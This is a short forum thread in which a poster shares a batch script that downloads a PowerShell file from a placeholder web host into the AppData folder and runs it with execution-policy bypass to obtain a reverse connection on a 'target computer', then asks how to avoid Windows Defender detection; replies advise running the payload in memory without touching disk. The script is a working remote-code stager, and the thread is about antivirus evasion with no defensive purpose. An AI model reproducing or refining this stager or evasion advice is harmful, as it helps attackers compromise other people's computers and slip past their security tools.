Evading antivirus – Digitalmunition

Home Forums Evading antivirus

This topic contains 1 reply, has 2 voices, and was last updated by  ShiroiOk 1 month, 1 week ago.

  • Author
  • #336901


    hey guys!!

    I have a .ps1 script which when executed on target computer give me the reverse connection.The problem is that you can’t run a ps1 file by directly clicking on it.So, I made a batch script which will execute the ps1 file , the code is pretty simple you can look at it.

    there is @ infront of echo but can’t able to put it(Reddit’s problem).

    echo off

    cd ..

    curl [http://www.xx.com/file.ps1](http://www.xx.com/file.ps1) -o %cd%\Appdata\local\file.ps1

    powershell -ep bypass %cd%\Appdata\local\hehe.ps1


    so , when i run this batch script it gives me reverse connection without any problem but when i convert this bat file to exe it get detected by window defender.

    so ,can u guys give me any tips on how to fix this.how can i get reverse connection without getting detected

  • #336902


    Run in memory nothing dropped to disk

  • #336903


    Don’t drop to disk

You must be logged in to reply to this topic.